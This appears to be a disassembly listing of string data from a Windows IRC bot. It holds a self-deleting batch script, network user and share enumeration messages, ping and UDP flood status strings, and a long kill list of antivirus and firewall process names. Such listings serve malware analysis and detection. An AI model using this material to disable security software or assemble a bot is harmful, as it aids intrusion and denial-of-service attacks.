aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_4057AC+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_4057AC+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_4057AC+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_4057AC+79�o
align 10h
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_4057AC+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_4057AC+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_4057AC+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_4057AC+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_4057AC+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_4057AC+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_4057AC+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_4057AC+A�o
; sub_41D188+1E�o
align 4
aMainDllTestCom db '[MAIN]: DLL test complete.',0 ; DATA XREF: sub_406395+2BE�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_406395+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_406395+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_406395+230�o
align 10h
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_406395+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_406395+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_406395+194�o
align 10h
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_406395+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_406395+12C�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_406395+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_406395+C4�o
align 4
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_406395+90�o
align 10h
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_406395+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_406395+28�o
align 4
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_406826+72�o
align 4
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_4068EB+6�o
; sub_40FC65+18�o
align 10h
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_40696D+1A�o
align 10h
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_406A11+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_406A33+13C�o
align 10h
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_406A33+80�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_406A33+43�o
align 10h
aContinued db 'Continued',0
align 4
aContinue_0 db 'Continue',0
align 4
aPaused db 'Paused',0
align 10h
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:0042B4A4�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:0042B4A0�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:0042B498�o
aStart_0 db 'Start',0 ; DATA XREF: .data:0042B494�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:0042B48C�o
align 10h
aList_1 db 'List',0 ; DATA XREF: .data:0042B488�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:0042B480�o
aDelete_0 db 'Delete',0 ; DATA XREF: .data:0042B47C�o
align 4
aAdded db 'Added',0 ; DATA XREF: .data:off_42B474�o
align 10h
aAdd db 'Add',0 ; DATA XREF: .data:off_42B470�o
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_406D69+128�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_406D69:loc_406E7D�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_406D69:loc_406E76�o
align 10h
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_406D69:loc_406E6F�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_406D69:loc_406E68�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_406D69:loc_406E61�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_406D69:loc_406E5A�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_406D69:loc_406E53�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_406D69:loc_406E4C�o
align 8
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_406D69:loc_406E45�o
db 'marked for deletion.',0
align 10h
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_406D69:loc_406E3E�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_406D69:loc_406E13�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_406D69:loc_406E0C�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_406D69:loc_406E05�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_406D69:loc_406DFE�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_406D69+8B�o
align 10h
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_406D69:loc_406DD3�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_406D69:loc_406DC9�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_406D69:loc_406DBF�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_406D69:loc_406DB5�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_406D69:loc_406DAB�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_406D69+38�o
align 10h
aSSS_0 db '%s: %s (%s)',0 ; DATA XREF: sub_406EE3+EE�o
aStopped db ' Stopped',0 ; DATA XREF: sub_406EE3:loc_406FB2�o
aStarting db ' Starting',0 ; DATA XREF: sub_406EE3:loc_406FAB�o
aStoping db ' Stoping',0 ; DATA XREF: sub_406EE3:loc_406FA4�o
aRunning db ' Running',0 ; DATA XREF: sub_406EE3:loc_406F9D�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_406EE3:loc_406F96�o
aPausing db ' Pausing',0 ; DATA XREF: sub_406EE3:loc_406F8F�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_406EE3:loc_406F88�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_406EE3+9E�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_406EE3+25�o
align 4
aNetUserInfoErr db '[NET]: User info error: <%ld>',0 ; DATA XREF: sub_4071EE+394�o
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_4071EE+36A�o
align 10h
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_4071EE+33F�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_4071EE+317�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_4071EE+2EC�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_4071EE+2C4�o
align 10h
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_4071EE+299�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_4071EE+271�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_4071EE+246�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_4071EE+21E�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_4071EE+1F3�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_4071EE+1CB�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_4071EE+1A0�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_4071EE+178�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_4071EE+14D�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_4071EE+125�o
aGuest db 'Guest',0 ; DATA XREF: sub_4071EE:loc_407307�o
align 4
aUser_1 db 'User',0 ; DATA XREF: sub_4071EE:loc_407300�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: sub_4071EE:loc_4072F9�o
align 10h
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_4071EE+D4�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_4071EE+AC�o
align 10h
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_4071EE+81�o
align 10h
aAccountS db 'Account: %S',0 ; DATA XREF: sub_4071EE+50�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_4075BC:loc_4076D5�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_4075BC:loc_4076CE�o
align 10h
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_4075BC:loc_4076C7�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_4075BC:loc_4076C0�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_4075BC:loc_4076B9�o
align 10h
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_4075BC:loc_40769C�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_4075BC:loc_407695�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_4075BC:loc_40768E�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_4075BC+CB�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_4075BC:loc_407663�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_4075BC:loc_40765C�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_4075BC:loc_407655�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_4075BC:loc_40764B�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_4075BC+85�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_4075BC:loc_407625�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_4075BC:loc_40761B�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_4075BC:loc_407611�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_4075BC:loc_407607�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_4075BC:loc_4075FD�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_4075BC+37�o
align 10h
aNetSServerSMes db '[NET]: %s <Server: %S> <Message: %S>',0 ; DATA XREF: sub_4076EC+A4�o
align 4
aNetMessageSent db '[NET]: Message sent successfully.',0 ; DATA XREF: sub_4076EC+7C�o
align 4
aNetSNoServiceS db '[NET]: %s: No service specified.',0 ; DATA XREF: sub_4077A8+65�o
align 10h
aNetErrorWithSe db '[NET]: Error with service: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4077A8+4F�o
aNetSServiceS_ db '[NET]: %s service: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4077A8+33�o
align 10h
aNetSNoShareSpe db '[NET]: %s: No share specified.',0 ; DATA XREF: sub_407820+AA�o
align 10h
aNetSShareS_ db '[NET]: %s share: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_407820+88�o
align 4
aNetSErrorWithS db '[NET]: %s: Error with share: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_407820+56�o
align 10h
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_4078DE+CE�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4078DE+BA�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_4078DE+B3�o
aNetShareListEr db '[NET]: Share list error: %s <%ld>',0 ; DATA XREF: sub_4078DE+74�o
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_4078DE+1D�o
align 4
aNetSNoUsername db '[NET]: %s: No username specified.',0 ; DATA XREF: sub_4079FD+B5�o
align 10h
aNetSErrorWithU db '[NET]: %s: Error with username: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4079FD+93�o
align 4
aNetSUsernameS_ db '[NET]: %s username: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4079FD+6D�o
align 4
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_407AC7+144�o
align 10h
aNetAnAccessVio db '[NET]: An access violation has occured.',0
; DATA XREF: sub_407AC7:loc_407BB2�o
aS_3 db ' %S',0 ; DATA XREF: sub_407AC7+B8�o
align 10h
aNetUserListErr db '[NET]: User list error: %s <%ld>',0 ; DATA XREF: sub_407AC7+78�o
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_407AC7+1F�o
aFlushdnsNotSup db '[FLUSHDNS]: Not supported by this system.',0
; DATA XREF: sub_407C73:loc_407D4A�o
align 4
aFlushdnsUnable db '[FLUSHDNS]: Unable to allocation ARP cache.',0
; DATA XREF: sub_407C73:loc_407D1B�o
aFlushdnsArpCac db '[FLUSHDNS]: ARP cache is empty.',0 ; DATA XREF: sub_407C73:loc_407CC7�o
aFlushdnsErrorG db '[FLUSHDNS]: Error getting ARP cache: <%d>.',0
; DATA XREF: sub_407C73+44�o
align 4
aPingFinishedSe db '[PING]: Finished sending pings to %s.',0 ; DATA XREF: sub_407DF7+138�o
align 4
aPingErrorSendi db '[PING]: Error sending pings to %s.',0 ; DATA XREF: sub_407DF7+6C�o
align 4
aUdpFinishedSen db '[UDP]: Finished sending packets to %s.',0 ; DATA XREF: sub_407F80+1CA�o
align 10h
aUdpErrorSendin db '[UDP]: Error sending pings to %s.',0 ; DATA XREF: sub_407F80+8C�o
align 4
aHass_exe db 'hass.exe',0 ; DATA XREF: .data:0042BEAC�o
align 10h
aWinmp_exe db 'winmp.exe',0 ; DATA XREF: .data:0042BEA8�o
align 4
aBling_exe db 'bling.exe',0 ; DATA XREF: .data:0042BEA4�o
align 4
aWuamgrd_exe db 'wuamgrd.exe',0 ; DATA XREF: .data:0042BEA0�o
aScguard_exe db 'scguard.exe',0 ; DATA XREF: .data:0042BE9C�o
aWinssv_exe db 'winssv.exe',0 ; DATA XREF: .data:0042BE98�o
align 4
aWruaclt_exe db 'WRUACLT.EXE',0 ; DATA XREF: .data:0042BE94�o
aWuacrlt_exe db 'WUACRLT.EXE',0 ; DATA XREF: .data:0042BE90�o
aWuanclt_exe db 'WUANCLT.EXE',0 ; DATA XREF: .data:0042BE8C�o
aMsconfig_exe db 'MsConfiG.exe',0 ; DATA XREF: .data:0042BE88�o
align 10h
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .data:0042BE84�o
align 10h
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:0042BE80�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:0042BE7C�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:0042BE78�o
align 4
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:0042BE74�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:0042BE70�o
align 10h
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:0042BE6C�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:0042BE68�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:0042BE64�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:0042BE60�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:0042BE5C�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:0042BE58�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:0042BE54�o
align 10h
aFAgobot_exe db 'F-AGOBOT.EXE',0 ; DATA XREF: .data:0042BE50�o
align 10h
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: .data:0042BE4C�o
align 10h
a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: .data:0042BE48�o
align 4
a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: .data:0042BE44�o
align 4
a_avp32_exe db '_AVP32.EXE',0 ; DATA XREF: .data:0042BE40�o
align 4
aZonealarm_exe db 'ZONEALARM.EXE',0 ; DATA XREF: .data:0042BE3C�o
align 4
aZonalm2601_exe db 'ZONALM2601.EXE',0 ; DATA XREF: .data:0042BE38�o
align 4
aZatutor_exe db 'ZATUTOR.EXE',0 ; DATA XREF: .data:0042BE34�o
aZapsetup3001_e db 'ZAPSETUP3001.EXE',0 ; DATA XREF: .data:0042BE30�o
align 4
aZapro_exe db 'ZAPRO.EXE',0 ; DATA XREF: .data:0042BE2C�o
align 10h
aXpf202en_exe db 'XPF202EN.EXE',0 ; DATA XREF: .data:0042BE28�o
align 10h
aWyvernworksfir db 'WYVERNWORKSFIREWALL.EXE',0 ; DATA XREF: .data:0042BE24�o
aWupdt_exe db 'WUPDT.EXE',0 ; DATA XREF: .data:0042BE20�o
align 4
aWupdater_exe db 'WUPDATER.EXE',0 ; DATA XREF: .data:0042BE1C�o
align 4
aWsbgate_exe db 'WSBGATE.EXE',0 ; DATA XREF: .data:0042BE18�o
aWrctrl_exe db 'WRCTRL.EXE',0 ; DATA XREF: .data:0042BE14�o
align 4
aWradmin_exe db 'WRADMIN.EXE',0 ; DATA XREF: .data:0042BE10�o
aWnt_exe db 'WNT.EXE',0 ; DATA XREF: .data:0042BE0C�o
aWnad_exe db 'WNAD.EXE',0 ; DATA XREF: .data:0042BE08�o
align 4
aWkufind_exe db 'WKUFIND.EXE',0 ; DATA XREF: .data:0042BE04�o
aWinupdate_exe db 'WINUPDATE.EXE',0 ; DATA XREF: .data:0042BE00�o
align 4
aWintsk32_exe db 'WINTSK32.EXE',0 ; DATA XREF: .data:0042BDFC�o
align 4
aWinstart001_ex db 'WINSTART001.EXE',0 ; DATA XREF: .data:0042BDF8�o
aWinstart_exe db 'WINSTART.EXE',0 ; DATA XREF: .data:0042BDF4�o
align 4
aWinssk32_exe db 'WINSSK32.EXE',0 ; DATA XREF: .data:0042BDF0�o
align 4
aWinservn_exe db 'WINSERVN.EXE',0 ; DATA XREF: .data:0042BDEC�o
align 4
aWinrecon_exe db 'WINRECON.EXE',0 ; DATA XREF: .data:0042BDE8�o
align 4
aWinppr32_exe db 'WINPPR32.EXE',0 ; DATA XREF: .data:0042BDE4�o
align 4
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .data:0042BDE0�o
align 4
aWinmain_exe db 'WINMAIN.EXE',0 ; DATA XREF: .data:0042BDDC�o
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .data:0042BDD8�o
align 10h
aWininitx_exe db 'WININITX.EXE',0 ; DATA XREF: .data:0042BDD4�o
align 10h
aWininit_exe db 'WININIT.EXE',0 ; DATA XREF: .data:0042BDD0�o
aWininetd_exe db 'WININETD.EXE',0 ; DATA XREF: .data:0042BDCC�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: .data:0042BDC8�o
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: .data:0042BDC4�o
align 4
aWinactive_exe db 'WINACTIVE.EXE',0 ; DATA XREF: .data:0042BDC0�o
align 4
aWin32us_exe db 'WIN32US.EXE',0 ; DATA XREF: .data:0042BDBC�o
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: .data:0042BDB8�o
align 4
aWinBugsfix_exe db 'WIN-BUGSFIX.EXE',0 ; DATA XREF: .data:0042BDB4�o
aWimmun32_exe db 'WIMMUN32.EXE',0 ; DATA XREF: .data:0042BDB0�o
align 4
aWhoswatchingme db 'WHOSWATCHINGME.EXE',0 ; DATA XREF: .data:0042BDAC�o
align 10h
aWgfe95_exe db 'WGFE95.EXE',0 ; DATA XREF: .data:0042BDA8�o
align 4
aWfindv32_exe db 'WFINDV32.EXE',0 ; DATA XREF: .data:0042BDA4�o
align 4
aWebtrap_exe db 'WEBTRAP.EXE',0 ; DATA XREF: .data:0042BDA0�o
aWebscanx_exe db 'WEBSCANX.EXE',0 ; DATA XREF: .data:0042BD9C�o
align 4
aWebdav_exe db 'WEBDAV.EXE',0 ; DATA XREF: .data:0042BD98�o
align 4
aWatchdog_exe db 'WATCHDOG.EXE',0 ; DATA XREF: .data:0042BD94�o
align 4
aW9x_exe db 'W9X.EXE',0 ; DATA XREF: .data:0042BD90�o
aW32dsm89_exe db 'W32DSM89.EXE',0 ; DATA XREF: .data:0042BD8C�o
align 4
aVswinperse_exe db 'VSWINPERSE.EXE',0 ; DATA XREF: .data:0042BD88�o
align 4
aVswinntse_exe db 'VSWINNTSE.EXE',0 ; DATA XREF: .data:0042BD84�o
align 4
aVswin9xe_exe db 'VSWIN9XE.EXE',0 ; DATA XREF: .data:0042BD80�o
align 4
aVsstat_exe db 'VSSTAT.EXE',0 ; DATA XREF: .data:0042BD7C�o
align 4
aVsmon_exe db 'VSMON.EXE',0 ; DATA XREF: .data:0042BD78�o
align 4
aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: .data:0042BD74�o
align 10h
aVsisetup_exe db 'VSISETUP.EXE',0 ; DATA XREF: .data:0042BD70�o
align 10h
aVshwin32_exe db 'VSHWIN32.EXE',0 ; DATA XREF: .data:0042BD6C�o
align 10h
aVsecomr_exe db 'VSECOMR.EXE',0 ; DATA XREF: .data:0042BD68�o
aVsched_exe db 'VSCHED.EXE',0 ; DATA XREF: .data:0042BD64�o
align 4
aVscenu6_02d30_ db 'VSCENU6.02D30.EXE',0 ; DATA XREF: .data:0042BD60�o
align 4
aVscan40_exe db 'VSCAN40.EXE',0 ; DATA XREF: .data:0042BD5C�o
aVptray_exe db 'VPTRAY.EXE',0 ; DATA XREF: .data:0042BD58�o
align 4
aVpfw30s_exe db 'VPFW30S.EXE',0 ; DATA XREF: .data:0042BD54�o
aVpc42_exe db 'VPC42.EXE',0 ; DATA XREF: .data:0042BD50�o
align 4
aVpc32_exe db 'VPC32.EXE',0 ; DATA XREF: .data:0042BD4C�o
align 4
aVnpc3000_exe db 'VNPC3000.EXE',0 ; DATA XREF: .data:0042BD48�o
align 4
aVnlan300_exe db 'VNLAN300.EXE',0 ; DATA XREF: .data:0042BD44�o
align 4
aVirusmdpersona db 'VIRUSMDPERSONALFIREWALL.EXE',0 ; DATA XREF: .data:0042BD40�o
aVirHelp_exe db 'VIR-HELP.EXE',0 ; DATA XREF: .data:0042BD3C�o
align 4
aVfsetup_exe db 'VFSETUP.EXE',0 ; DATA XREF: .data:0042BD38�o
aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: .data:0042BD34�o
aVet95_exe db 'VET95.EXE',0 ; DATA XREF: .data:0042BD30�o
align 4
aVet32_exe db 'VET32.EXE',0 ; DATA XREF: .data:0042BD2C�o
align 4
aVcsetup_exe db 'VCSETUP.EXE',0 ; DATA XREF: .data:0042BD28�o
aVbwinntw_exe db 'VBWINNTW.EXE',0 ; DATA XREF: .data:0042BD24�o
align 10h
aVbwin9x_exe db 'VBWIN9X.EXE',0 ; DATA XREF: .data:0042BD20�o
aVbust_exe db 'VBUST.EXE',0 ; DATA XREF: .data:0042BD1C�o
align 4
aVbcons_exe db 'VBCONS.EXE',0 ; DATA XREF: .data:0042BD18�o
align 4
aVbcmserv_exe db 'VBCMSERV.EXE',0 ; DATA XREF: .data:0042BD14�o
align 4
aUtpost_exe db 'UTPOST.EXE',0 ; DATA XREF: .data:0042BD10�o
align 10h
aUpgrad_exe db 'UPGRAD.EXE',0 ; DATA XREF: .data:0042BD0C�o
align 4
aUpdate_exe db 'UPDATE.EXE',0 ; DATA XREF: .data:0042BD04�o
; .data:0042BD08�o
align 4
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: .data:0042BD00�o
align 4
aUndoboot_exe db 'UNDOBOOT.EXE',0 ; DATA XREF: .data:0042BCFC�o
align 4
aTvtmd_exe db 'TVTMD.EXE',0 ; DATA XREF: .data:0042BCF8�o
align 10h
aTvmd_exe db 'TVMD.EXE',0 ; DATA XREF: .data:0042BCF4�o
align 4
aTsadbot_exe db 'TSADBOT.EXE',0 ; DATA XREF: .data:0042BCF0�o
aTrojantrap3_ex db 'TROJANTRAP3.EXE',0 ; DATA XREF: .data:0042BCEC�o
aTrjsetup_exe db 'TRJSETUP.EXE',0 ; DATA XREF: .data:0042BCE8�o
align 4
aTrjscan_exe db 'TRJSCAN.EXE',0 ; DATA XREF: .data:0042BCE4�o
aTrickler_exe db 'TRICKLER.EXE',0 ; DATA XREF: .data:0042BCE0�o
align 4
aTracert_exe db 'TRACERT.EXE',0 ; DATA XREF: .data:0042BCDC�o
aTitaninxp_exe db 'TITANINXP.EXE',0 ; DATA XREF: .data:0042BCD8�o
align 10h
aTitanin_exe db 'TITANIN.EXE',0 ; DATA XREF: .data:0042BCD4�o
aTgbob_exe db 'TGBOB.EXE',0 ; DATA XREF: .data:0042BCD0�o
align 4
aTfak5_exe db 'TFAK5.EXE',0 ; DATA XREF: .data:0042BCCC�o
align 4
aTfak_exe db 'TFAK.EXE',0 ; DATA XREF: .data:0042BCC8�o
align 10h
aTeekids_exe db 'TEEKIDS.EXE',0 ; DATA XREF: .data:0042BCC4�o
aTds2Nt_exe db 'TDS2-NT.EXE',0 ; DATA XREF: .data:0042BCC0�o
aTds298_exe db 'TDS2-98.EXE',0 ; DATA XREF: .data:0042BCBC�o
aTds3_exe db 'TDS-3.EXE',0 ; DATA XREF: .data:0042BCB8�o
align 10h
aTcm_exe db 'TCM.EXE',0 ; DATA XREF: .data:0042BCB4�o
aTca_exe db 'TCA.EXE',0 ; DATA XREF: .data:0042BCB0�o
aTc_exe db 'TC.EXE',0 ; DATA XREF: .data:0042BCAC�o
align 4
aTbscan_exe db 'TBSCAN.EXE',0 ; DATA XREF: .data:0042BCA8�o
align 4
aTaumon_exe db 'TAUMON.EXE',0 ; DATA XREF: .data:0042BCA4�o
align 10h
aTaskmon_exe db 'TASKMON.EXE',0 ; DATA XREF: .data:0042BCA0�o
aTaskmo_exe db 'TASKMO.EXE',0 ; DATA XREF: .data:0042BC9C�o
align 4
aTaskmg_exe db 'TASKMG.EXE',0 ; DATA XREF: .data:0042BC98�o
align 4
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .data:0042BC94�o
align 10h
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .data:0042BC90�o
align 10h
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .data:0042BC8C�o
align 4
aSysedit_exe db 'SYSEDIT.EXE',0 ; DATA XREF: .data:0042BC88�o
aSymtray_exe db 'SYMTRAY.EXE',0 ; DATA XREF: .data:0042BC84�o
aSymproxysvc_ex db 'SYMPROXYSVC.EXE',0 ; DATA XREF: .data:0042BC80�o
aSweepnet_sweep db 'SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE',0 ; DATA XREF: .data:0042BC7C�o
align 4
aSweep95_exe db 'SWEEP95.EXE',0 ; DATA XREF: .data:0042BC78�o
aUpd32_exe db 'UPD32.EXE',0 ; DATA XREF: .data:0042BC74�o
align 10h
aSvshost32_exe db 'SVSHOST32.EXE',0 ; DATA XREF: .data:0042BC70�o
align 10h
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .data:0042BC6C�o
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .data:0042BC68�o
align 4
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .data:0042BC64�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .data:0042BC60�o
aSupporter5_exe db 'SUPPORTER5.EXE',0 ; DATA XREF: .data:0042BC5C�o
align 4
aSupport_exe db 'SUPPORT.EXE',0 ; DATA XREF: .data:0042BC58�o
aSupftrl_exe db 'SUPFTRL.EXE',0 ; DATA XREF: .data:0042BC54�o
aStcloader_exe db 'STCLOADER.EXE',0 ; DATA XREF: .data:0042BC50�o
align 4
aStart_exe db 'START.EXE',0 ; DATA XREF: .data:0042BC4C�o
align 4
aSt2_exe db 'ST2.EXE',0 ; DATA XREF: .data:0042BC48�o
aSsg_4104_exe db 'SSG_4104.EXE',0 ; DATA XREF: .data:0042BC44�o
align 10h
